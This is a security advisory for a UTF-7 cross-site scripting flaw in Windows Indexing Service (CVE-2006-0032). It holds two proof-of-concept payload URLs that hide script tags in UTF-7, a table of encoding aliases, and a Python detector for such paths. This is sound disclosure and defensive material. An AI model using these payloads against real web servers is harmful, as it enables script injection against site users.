Credit:
The information has been provided by Eiji James Yoshida.
The original article can be found at: http://www.geocities.jp/ptrs_sec/advisory09e.html
Affected Software:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
* Microsoft Windows Server 2003 x64 Edition
Proof of concept:
http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-+AC8-SCRIPT+AD4-.ida
UTF-7("<") = +ADw-, +ADx-, +ADy-, +ADz-
UTF-7(">") = +AD4-, +AD5-, +AD6-, +AD7-
UTF-7("/") = +AC8-, +AC9-
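The aliases listed above exist because three modified-base64 characters carry 18 bits for one 16-bit character, and a lenient decoder ignores the two spare bits. The following is an added example, not code from the advisory or from Microsoft: a request-path check that decodes UTF-7 blocks the same lenient way and reports any that hide "<", ">" or "/". The function names and sample paths are constructed for illustration.

```python
import re
from urllib.parse import unquote

B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# A UTF-7 shifted block: "+", modified-base64 characters, optional closing "-".
SHIFT = re.compile(r"\+([A-Za-z0-9+/]*)-?")
# Characters the advisory lists as reachable through UTF-7 encoding.
WATCHED = set("<>/")


def _decode_block(match):
    """Decode one shifted block to text, ignoring leftover padding bits."""
    body = match.group(1)
    if not body:
        return "+"  # "+-" (or a bare "+") is a literal plus sign
    bits = "".join(format(B64.index(c), "06b") for c in body)
    # Keep only whole 16-bit UTF-16 units. The trailing bits are dropped
    # without checking them, so +ADw-, +ADx-, +ADy- and +ADz- all give "<".
    units = [int(bits[i:i + 16], 2) for i in range(0, len(bits) - 15, 16)]
    return "".join(chr(u) for u in units)


def hidden_markup(url_path):
    """Return (encoded, decoded) pairs for UTF-7 blocks hiding watched chars."""
    raw = unquote(url_path)  # also catches a percent-encoded "+" (%2B)
    found = []
    for match in SHIFT.finditer(raw):
        text = _decode_block(match)
        if WATCHED & set(text):
            found.append((match.group(0), text))
    return found


if __name__ == "__main__":
    # Constructed sample request paths, not taken from real logs.
    samples = [
        "/+ADx-b+AD5-.htw",      # alias encodings of "<" and ">"
        "/%2BADz-i%2BAD7-.ida",  # same idea with the "+" percent-encoded
        "/docs/a+b.htm",         # ordinary "+" in a file name
        "/iisstart.asp",         # no shifted block at all
    ]
    for path in samples:
        hits = hidden_markup(path)
        print("FLAG " if hits else "ok   ", path, hits)
```

A filter that matches only the canonical +ADw- and +AD4- strings would miss the alias forms, which is why the check decodes each block instead of comparing text.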
Patch:
Microsoft has released a patch in MS06-053 that resolves this issue: http://www.microsoft.com/technet/security/bulletin/ms06-053.mspx
Vendor status:
IPA/ISEC was notified on the 27th December 2005. Microsoft released a patch for this vulnerability on the 12th September 2006.
CVE Information:
CVE-2006-0032